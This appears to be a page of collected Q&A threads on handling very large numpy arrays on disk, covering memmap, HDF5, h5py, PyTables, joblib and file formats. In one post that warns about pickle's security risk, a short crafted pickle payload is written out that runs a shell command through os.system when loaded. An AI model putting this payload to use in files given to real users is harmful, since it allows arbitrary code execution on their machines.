There are a bunch of questions on SO that appear to be the same, but they don't really answer my question fully. I think this is a pretty common use-case for computational scientists, so I'm creating a new question.
QUESTION:
I read in several small numpy arrays from files (~10 MB each) and do some processing on them. I want to create a larger array (~1 TB) where each dimension in the array contains the data from one of these smaller files. Any method that tries to create the whole larger array (or a substantial part of it) in the RAM is not suitable, since it floods up the RAM and brings the machine to a halt. So I need to be able to initialize the larger array and fill it in small batches, so that each batch gets written to the larger array on disk.
I initially thought that numpy.memmap is the way to go, but when I issue a command like
mmapData = np.memmap(mmapFile,mode='w+', shape=(large_no1,large_no2))
the RAM floods and the machine slows to a halt.
After poking around a bit it seems like PyTables might be well suited for this sort of thing, but I'm not really sure. Also, it was hard to find a simple example in the doc or elsewhere which illustrates this common use-case.
IF anyone knows how this can be done using PyTables, or if there's a more efficient/faster way to do this, please let me know! Any refs. to examples appreciated!
That's weird. The np.memmap should work. I've been using it with 250Gb data on a 12Gb RAM machine without problems.
Does the system really runs out of memory at the very moment of the creation of the memmap file? Or it happens along the code? If it happens at the file creation I really don't know what the problem would be.
When I started using memmap I've made some mistakes that led me to memory run out. For me, something like the below code should work:
mmapData = np.memmap(mmapFile, mode='w+', shape = (smallarray_size,number_of_arrays), dtype ='float64')
for k in range(number_of_arrays):
smallarray = np.fromfile(list_of_files[k]) # list_of_file is the list with the files name
smallarray = do_something_with_array(smallarray)
mmapData[:,k] = smallarray
It may not be the most efficient way, but it seems to me that it would have the lowest memory usage.
Ps: Be aware that the default dtype value for memmap(int) and fromfile(float) are different!
HDF5 is a C library that can efficiently store large on-disk arrays. Both PyTables and h5py are Python libraries on top of HDF5. If you're using tabular data then PyTables might be preferred; if you have just plain arrays then h5py is probably more stable/simpler.
There are out-of-core numpy array solutions that handle the chunking for you. Dask.array would give you plain numpy semantics on top of your collection of chunked files (see docs on stacking.)
Related
I am searching for the best possible solution for storing large dense 2D matrices of floating-point data, generally float32 data.
The goal would be to share scientific data more easily from websites like the Internet Archive and make such data FAIR.
My current approaches (listed below) fall short of the desired goal, so I thought I might ask here, hoping to find something new, such as a better data structure. Even though my examples are in Python, the solution does not need to be in Python. Any good solution will do, even one in COBOL!
CSV-based
One approach I tried would be to store the values as compressed CSVs using pandas, but this is excruciatingly slow, and the end compression is not exactly optimal (generally a 50% from the plain CSV on the data I tried this on, which is not flawed but not sufficient to make this viable.) In this example, I am using gzip. I have also tried LZMA, but it is generally way slower, and, at least on the data I tried it on, it does not yield a significantly better result.
import pandas as pd
my_data: pd.DataFrame = create_my_data_doing_something()
my_data.to_csv("my_data_saved.csv.gz")
NumPy Based
Another solution is to store the data into a NumPy-like matrix and then compress it on a disk.
import numpy as np
my_data: np.ndarray = create_my_data_doing_something()
np.save("my_data_saved.npy", my_data)
and afterwards
gzip -k my_data_saved.npy
Numpy with H5
Another possible compression is H5, but as shown in the benchmark below it does not do better than the plain numpy.
with h5py.File("my_data_saved.h5", 'w') as hf:
hf.create_dataset("my_data_saved", data=my_data)
Issues in using the Numpy format
While this may be a good solution, we limit the scope of usability of the data to people that can use Python. Of course, this is a vast pool of people, though, in my circles, many biologists and mathematicians abhor Python and like to stick to Matlab and R (and therefore would not know what to do with a .npy.gz file).
Pickle
Another solution, as correctly pointed out by #lojza, is to store the data into a pickle object, which may also be compressed to a disk. Pickle obtains in my benchmarks (see below) a compression ratio comparable with what is obtained with Numpy.
import pickle
import compress_pickle
my_data: np.ndarray = create_my_data_doing_something()
# Not compressed pickle
with open("my_data_saved.pkl", "wb") as f:
pickle.dump(my_data, f)
# Compressed version
compress_pickle.dump(df, "my_data_saved.pkl.gz")
Issues in using Pickle format
The issue in using Pickle is two-fold: first, the same Python-dependency issue discussed above. Secondly, there is a significant security issue: the Pickle format can be used for arbitrary code execution exploits. People should be wary of downloading random pickle files from the internet (and here, the goal is to make people share datasets on the internet).
python import pickle
# Build the exploit
command = b"""cat flag.txt"""
x = b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command
# Test it
pickle.load(x)
Benchmarks
I have executed benchmarks to provide a baseline on which to improve. Here, we can see that generally, Numpy is the best performing choice, and to my knowledge, it should not have any security risk in its format. It follows that a compressed NumPy array is currently the best contender, please let's find a better one!
Examples
To share some actual use cases of this relatively simple task, I share a couple of graphs embedding the complete OBO Foundry graph. If there were a way to make these files smaller, sharing them would be significantly more accessible, allowing for more reproducible experiments and accelerating research in the bio-ontologies (for this specific data) and other fields.
OBO Foundry embedded using CBOW
OBO Foundry embedded using TransE
What other approaches may I try?
I'm trying to write a program that parses data from a (very) large file that contains even rows of 8 sets of 16 bit hex values. For instance, one row would look like this:
edfc b600 edfc 2102 81fb 0000 d1fe 0eff
The data files are expected to be anywhere between 1-4 TB, so I wasn't sure what the best approach would be. If I load this file using Python's open() function, could this turn out badly? I'm worried about how much of an impact this will have on my memory if I'm loading such a large file just to index through. Alternatively, if there's a method I can use to load just the section of data I want from the file, that would be ideal, but as far as I know, I don't think that's even possible. Is this correct?
Anyway, Some sort of idea as to how to approach this very general problem would be much appreciated!
Found an answer from Github. In numpy, there's a function called memmap that works for what I'm doing.
samples = np.memmap("hexdump_samples", mode="r", dtype=np.int16)[100:159]
This didn't seem to cause any issues with the smaller data set I was using, but I can't imagine this causing any issues with memory with the larger files. As far as I understand, this wouldn't cause any issues.
It depends on your computer hardware, how much RAM you have. Python is an interpreted language with a bunch of safeguards, but I wouldn't risk trying to open that file with Python. I would recommend using C or C++, they are good with large amounts of data and memory management. You can then parse the data in bite sized chunks, maybe 16MB per chunk. Python is a extremely slow and memory inefficient compared to C.
I am using numpy and trying to create a huge matrix.
While doing this, I receive a memory error
Because the matrix is not important, I will just show the way how to easily reproduce the error.
a = 10000000000
data = np.array([float('nan')] * a)
not surprisingly, this throws me MemoryError
There are two things I would like to tell:
I really need to create and to use a big matrix
I think I have enough RAM to handle this matrix (I have 24 Gb or RAM)
Is there an easy way to handle big matrices in numpy?
Just to be on the safe side, I previously read these posts (which sounds similar):
Very large matrices using Python and NumPy
Python/Numpy MemoryError
Processing a very very big data set in python - memory error
P.S. apparently I have some problems with multiplication and division of numbers, which made me think that I have enough memory. So I think it is time for me to go to sleep, review math and may be to buy some memory.
May be during this time some genius might come up with idea how to actually create this matrix using only 24 Gb of Ram.
Why I need this big matrix
I am not going to do any manipulations with this matrix. All I need to do with it is to save it into pytables.
Assuming each floating point number is 4 bytes each, you'd have
(10000000000 * 4) /(2**30.0) = 37.25290298461914
Or 37.5 gigabytes you need to store in memory. So I don't think 24gb of RAM is enough.
If you can't afford creating such a matrix, but still wish to do some computations, try sparse matrices.
If you wish to pass it to another Python package that uses duck typing, you may create your own class with __getitem__ implementing dummy access.
If you use pycharm editor for python you can change memory settings from
C:\Program Files\JetBrains\PyCharm 2018.2.4\bin\pycharm64.exe.vmoptions
you can decrease pycharm speed from this file so your program memory will allocate more megabites
you must edit this codes
-Xms1024m
-Xmx2048m
-XX:ReservedCodeCacheSize=960m
so you can make them -Xms512m -Xmx1024m and finally your program will work
but it'll affect the debugging performance in pycharm.
I've currently got a project running on PiCloud that involves multiple iterations of an ODE Solver. Each iteration produces a NumPy array of about 30 rows and 1500 columns, with each iterations being appended to the bottom of the array of the previous results.
Normally, I'd just let these fairly big arrays be returned by the function, hold them in memory and deal with them all at one. Except PiCloud has a fairly restrictive cap on the size of the data that can be out and out returned by a function, to keep down on transmission costs. Which is fine, except that means I'd have to launch thousands of jobs, each running on iteration, with considerable overhead.
It appears the best solution to this is to write the output to a file, and then collect the file using another function they have that doesn't have a transfer limit.
Is my best bet to do this just dumping it into a CSV file? Should I add to the CSV file each iteration, or hold it all in an array until the end and then just write once? Is there something terribly clever I'm missing?
Unless there is a reason for the intermediate files to be human-readable, do not use CSV, as this will inevitably involve a loss of precision.
The most efficient is probably tofile (doc) which is intended for quick dumps of file to disk when you know all of the attributes of the data ahead of time.
For platform-independent, but numpy-specific, saves, you can use save (doc).
Numpy and scipy also have support for various scientific data formats like HDF5 if you need portability.
I would recommend looking at the pickle module. The pickle module allows you to serialize python objects as streams of bytes (e.g., strings). This allows you to write them to a file or send them over a network, and then reinstantiate the objects later.
Try Joblib - Fast compressed persistence
One of the key components of joblib is it’s ability to persist arbitrary Python objects, and read them back very quickly. It is particularly efficient for containers that do their heavy lifting with numpy arrays. The trick to achieving great speed has been to save in separate files the numpy arrays, and load them via memmapping.
Edit:
Newer (2016) blog entry on data persistence in Joblib
There seems to be many choices for Python to interface with SQLite (sqlite3, atpy) and HDF5 (h5py, pyTables) -- I wonder if anyone has experience using these together with numpy arrays or data tables (structured/record arrays), and which of these most seamlessly integrate with "scientific" modules (numpy, scipy) for each data format (SQLite and HDF5).
Most of it depends on your use case.
I have a lot more experience dealing with the various HDF5-based methods than traditional relational databases, so I can't comment too much on SQLite libraries for python...
At least as far as h5py vs pyTables, they both offer very seamless access via numpy arrays, but they're oriented towards very different use cases.
If you have n-dimensional data that you want to quickly access an arbitrary index-based slice of, then it's much more simple to use h5py. If you have data that's more table-like, and you want to query it, then pyTables is a much better option.
h5py is a relatively "vanilla" wrapper around the HDF5 libraries compared to pyTables. This is a very good thing if you're going to be regularly accessing your HDF file from another language (pyTables adds some extra metadata). h5py can do a lot, but for some use cases (e.g. what pyTables does) you're going to need to spend more time tweaking things.
pyTables has some really nice features. However, if your data doesn't look much like a table, then it's probably not the best option.
To give a more concrete example, I work a lot with fairly large (tens of GB) 3 and 4 dimensional arrays of data. They're homogenous arrays of floats, ints, uint8s, etc. I usually want to access a small subset of the entire dataset. h5py makes this very simple, and does a fairly good job of auto-guessing a reasonable chunk size. Grabbing an arbitrary chunk or slice from disk is much, much faster than for a simple memmapped file. (Emphasis on arbitrary... Obviously, if you want to grab an entire "X" slice, then a C-ordered memmapped array is impossible to beat, as all the data in an "X" slice are adjacent on disk.)
As a counter example, my wife collects data from a wide array of sensors that sample at minute to second intervals over several years. She needs to store and run arbitrary querys (and relatively simple calculations) on her data. pyTables makes this use case very easy and fast, and still has some advantages over traditional relational databases. (Particularly in terms of disk usage and speed at which a large (index-based) chunk of data can be read into memory)